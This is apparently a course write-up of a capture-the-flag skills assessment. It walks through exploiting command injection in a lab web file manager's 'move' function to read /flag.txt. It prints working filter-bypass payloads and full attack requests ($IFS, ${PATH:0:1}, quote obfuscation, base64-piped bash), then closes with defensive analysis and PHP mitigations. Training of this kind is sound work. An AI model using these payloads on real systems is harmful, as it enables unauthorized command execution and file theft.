🎯Skills Assessment

🎯 Final Assessment: Comprehensive practical scenario integrating all command injection techniques

Overview

This Skills Assessment represents a real-world penetration testing scenario that requires students to apply all the techniques learned throughout the Command Injection module. The challenge involves a web-based file manager application with command injection vulnerabilities that must be identified and exploited using advanced bypass techniques.

Skills Tested:

  • Web application reconnaissance

  • Command injection detection

  • GET parameter manipulation

  • Filter identification and bypass

  • Multiple payload construction methods

  • Tool integration (Burp Suite)

Challenge Description

Target Application: Web File Manager

Question: What is the content of '/flag.txt'?

Initial Access:

  • URL: Target machine web interface

  • Credentials: guest:guest

  • Application Type: Web-based file management system

Step-by-Step Walkthrough

Phase 1: Initial Access and Reconnaissance

Step 1: Login to Application

After spawning the target machine, navigate to the website's root webpage and login with the provided credentials:

Username: guest
Password: guest

Step 2: Application Analysis

Once signed in to the web-based file manager, observe the available functionality:

  • File listing - Multiple files and folders visible

  • File operations - Four clickable buttons per file:

    • Preview

    • Copy to...

    • Direct link

    • Download

Step 3: Identify Attack Vector

The "Copy to..." button appears most promising for command injection because:

  • Backend likely uses system commands (mv, move, cp)

  • File operations typically involve OS-level commands

  • Parameters are likely passed to shell commands

Phase 2: Vulnerability Discovery

Step 4: Test Copy Functionality

Clicking "Copy to..." redirects to a new page with:

  • Two main options: Copy and Move

  • Destination selection: Folder chooser

  • URL parameters: Visible in address bar

Step 5: Initial Injection Testing

Testing the Copy function with character injection in URL shows no command execution indicators.

Step 6: Focus on Move Functionality

Testing the Move function without selecting destination folder produces error:

Error Message Example:

mv: cannot move 'source_file' to 'destination': No such file or directory

Key Insight: This error reveals:

  • Backend uses mv command

  • Error messages are displayed to user

  • We can capture command output through error messages

Phase 3: Injection Vector Identification

Step 7: Analyze Request Parameters

Using Burp Suite to intercept the Move request reveals two GET parameters:

  • to - Destination path

  • from - Source file

Example Request:

GET /index.php?to=tmp&from=51459716.txt&finish=1&move=1 HTTP/1.1

Step 8: Test Injection Operators

Testing various injection operators in both parameters:

Operator
Result

;

"Malicious request denied!"

|

"Malicious request denied!"

&&

"Malicious request denied!"

&

βœ… Request passes

Key Discovery: The & operator is whitelisted because developers assumed it's required for URL structure.

Phase 4: Exploitation Development

Step 9: Parameter Selection

Both to and from parameters can be used for injection since they both constitute the command being executed by the backend.

Step 10: Payload Construction Requirements

To successfully read /flag.txt, we need to bypass:

  • Space filter - Use $IFS or %09

  • Slash filter - Use ${PATH:0:1}

  • Command detection - Use quote obfuscation

Step 11: Payload Development

Method 1: Direct Command with Obfuscation

# Target command: cat /flag.txt
# Obfuscated: c"a"t /flag.txt
# With bypasses: c"a"t${IFS}${PATH:0:1}flag.txt
# With injection: ${IFS}&c"a"t${IFS}${PATH:0:1}flag.txt
# URL encoded: $IFS%26c"a"t$IFS${PATH:0:1}flag.txt

Method 2: Base64 Encoded Command

# Encode command
echo -n 'cat /flag.txt' | base64
# Result: Y2F0IC9mbGFnLnR4dA==

# Create payload
bash<<<$(base64 -d<<<Y2F0IC9mbGFnLnR4dA==)
# With obfuscation: b"a"sh<<<$(base64%09-d<<<Y2F0IC9mbGFnLnR4dA==)
# With injection: ${IFS}&b"a"sh<<<$(base64%09-d<<<Y2F0IC9mbGFnLnR4dA==)
# URL encoded: $IFS%26b"a"sh<<<$(base64%09-d<<<Y2F0IC9mbGFnLnR4dA==)

Phase 5: Exploitation Execution

Step 12: Burp Suite Setup

  1. Configure Proxy: Set FoxyProxy to "BURP" profile

  2. Intercept Request: Click Move with no destination folder

  3. Send to Repeater: Use Ctrl+R to send intercepted request

Step 13: Execute Method 1 (Direct Command)

Modified Request:

GET /index.php?to=tmp$IFS%26c"a"t$IFS${PATH:0:1}flag.txt&from=51459716.txt&finish=1&move=1 HTTP/1.1

Step 14: Execute Method 2 (Base64 Encoded)

Modified Request:

GET /index.php?to=tmp$IFS%26b"a"sh<<<$(base64%09-d<<<Y2F0IC9mbGFnLnR4dA==)&from=51459716.txt&finish=1&move=1 HTTP/1.1

Phase 6: Flag Extraction

Step 15: Analyze Response

Both payloads will return the flag in the error message section of the HTTP response.

Expected Flag:

HTB{...}

Technical Analysis

Vulnerability Details

Injection Point: GET parameters in web file manager

// Vulnerable backend code (conceptual)
$to = $_GET['to'];
$from = $_GET['from'];
exec("mv $from $to", $output, $return_code);

Root Cause:

  • Insufficient input validation

  • Direct parameter interpolation into system commands

  • Error message disclosure

Filter Analysis

Implemented Filters:

  • βœ… Semicolon (;) blocked

  • βœ… Pipe (|) blocked

  • βœ… AND (&&) blocked

  • ❌ Ampersand (&) whitelisted

Filter Bypass Strategy:

  • Space bypass: $IFS environment variable

  • Slash bypass: ${PATH:0:1} character extraction

  • Command obfuscation: Quote injection (c"a"t)

  • Encoding: Base64 for complex commands

Alternative Exploitation Methods

Method 3: Environment Variable Techniques

Using Multiple Environment Variables:

# Alternative character sources
${HOME:0:1}    # Extract '/' from HOME path
${PWD:0:1}     # Extract first character of current directory
${USER:0:1}    # Extract first character of username

Payload Example:

to=tmp$IFS%26c"a"t$IFS${HOME:0:1}flag.txt

Method 4: Advanced Obfuscation Combinations

Multi-layer Obfuscation:

# Combine multiple techniques
${IFS}&$(tr$IFS"[A-Z]"$IFS"[a-z]"<<<"C"A"T")$IFS${PATH:0:1}flag.txt

Method 5: Windows Alternative (If Applicable)

Windows Environment Variables:

# If target were Windows
%TEMP:~-3,-2%    # Character extraction from TEMP
%HOMEPATH:~0,1%  # Extract backslash

Defense Analysis

Identified Security Weaknesses

  1. Input Validation Failure

    • No sanitization of user input

    • Direct parameter interpolation

  2. Filter Implementation Flaws

    • Incomplete blacklist approach

    • URL context assumptions (& whitelisting)

  3. Error Information Disclosure

    • System error messages exposed

    • Command output visible to users

  4. Command Execution Design

    • Direct shell command execution

    • No command isolation

Recommended Mitigations

1. Input Validation

// Whitelist validation
function validateFilename($filename) {
    if (!preg_match('/^[a-zA-Z0-9._-]+$/', $filename)) {
        throw new InvalidArgumentException('Invalid filename');
    }
    return $filename;
}

2. Parameterized Operations

// Use file system functions instead of shell commands
function moveFile($source, $destination) {
    if (!rename($source, $destination)) {
        throw new RuntimeException('Move operation failed');
    }
}

3. Error Handling

// Generic error messages
function handleError($error) {
    error_log($error); // Log for admin
    return "Operation failed. Please try again."; // User message
}

Learning Outcomes

Skills Demonstrated

βœ… Technical Skills:

  • Web application analysis

  • HTTP parameter manipulation

  • Command injection exploitation

  • Filter identification and bypass

  • Multiple payload construction

  • Tool integration (Burp Suite)

βœ… Methodology:

  • Systematic vulnerability assessment

  • Incremental exploitation development

  • Alternative approach consideration

  • Defense-aware testing

βœ… Real-world Application:

  • Professional penetration testing workflow

  • Documentation and reporting

  • Risk assessment and mitigation

Attack Chain Summary

graph TD
    A[Initial Access] --> B[Application Reconnaissance]
    B --> C[Function Analysis]
    C --> D[Injection Point Discovery]
    D --> E[Filter Testing]
    E --> F[Bypass Development]
    F --> G[Payload Construction]
    G --> H[Tool Integration]
    H --> I[Exploitation Execution]
    I --> J[Flag Extraction]

Key Takeaways

Critical Success Factors

  1. Systematic Approach - Methodical testing of all functions

  2. Filter Analysis - Understanding what's blocked vs. allowed

  3. Multiple Techniques - Having backup exploitation methods

  4. Tool Proficiency - Effective use of Burp Suite

  5. Bypass Creativity - Combining multiple evasion techniques

Professional Applications

  • Web Application Security Testing

  • File Manager Vulnerability Assessment

  • GET Parameter Security Analysis

  • Error-based Information Disclosure Testing

This comprehensive Skills Assessment demonstrates mastery of command injection techniques in a realistic web application environment, preparing students for professional penetration testing scenarios.

PreviousEvasion ToolsNextWeb Attacks

Last updated